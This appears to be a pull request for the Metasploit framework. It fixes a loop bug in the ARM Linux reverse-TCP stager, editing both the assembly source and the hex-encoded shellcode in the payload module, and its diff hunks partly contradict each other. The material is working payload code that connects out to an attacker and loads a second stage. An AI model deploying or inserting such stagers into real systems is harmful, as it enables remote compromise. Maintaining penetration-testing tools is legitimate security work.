### PR TITLE
[shellcode, stager] ARM stager restore r0 in loop

### DIFF
--- a/external/source/shellcode/linux/armle/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/armle/stager_sock_reverse.s
@@ -75,10 +75,10 @@ _start:
 @ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
 	add r7,#99         @ __NR_recv
 	mov r1,r0          @ *buf
-	mov r0,r12         @ sockfd
 	mov r3,#0          @ flags
 @ remove blocksize from total length
 loop:
+	mov r0,r12         @ sockfd
 	ldr r2,[sp,#0]
 	sub r2,#1000
 	str r2,[sp,#0]
@@ -88,7 +88,6 @@ loop:
 	swi 0
 	cmp r0, #0
 	blt failed
- 	mov r0, r12        @ replace return code with sockfd
 	b loop
 last:
 	add r2,#1000       @ len

--- a/external/source/shellcode/linux/armle/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/armle/stager_sock_reverse.s
@@ -88,6 +88,7 @@ loop:
 	swi 0
 	cmp r0, #0
 	blt failed
+ 	mov r0, r12        @ replace return code with sockfd
 	b loop
 last:
 	add r2,#1000       @ len

--- a/modules/payloads/stagers/linux/armle/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/armle/reverse_tcp.rb
@@ -89,7 +89,7 @@ module MetasploitModule
             0xef000000,          #        svc     0x00000000        ; invoke recv
             0xe3500000,          #        cmp     r0, #0
             0xba000005,          #        blt     817c <failed>
-            0xeafffff5,          #        b       80dc <loop>
+            0xeafffff4,          #        b       80dc <loop>
                                  #  last:
             0xe2822ffa,          #        add     r2, r2, #1000
             0xef000000,          #        svc     0x00000000        ; invoke recv

--- a/modules/payloads/stagers/linux/armle/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/armle/reverse_tcp.rb
@@ -77,9 +77,9 @@ module MetasploitModule
             0x0a000012,          #        beq     <failed>
             0xe2877063,          #        add     r7, r7, #99       ; set 291(0x123) to r7
             0xe1a01000,          #        mov     r1, r0
-            0xe1a0000c,          #        mov     r0, ip
             0xe3a03000,          #        mov     r3, #0
                                  #  loop:
+            0xe1a0000c,          #        mov     r0, ip
             0xe59d2000,          #        ldr     r2, [sp]
             0xe2422ffa,          #        sub     r2, r2, #1000
             0xe58d2000,          #        str     r2, [sp]


### PR DESCRIPTION
r0 has return value instead of sockfd in second loop iteration

After first iteration r0 is filled with recv() return code, however we expect it to have sockfd for the next iteration, otherwise recv() will attempt to read from bad file descriptor (aka return value of previous recv() call)

It might require to modify stager inside modules directory.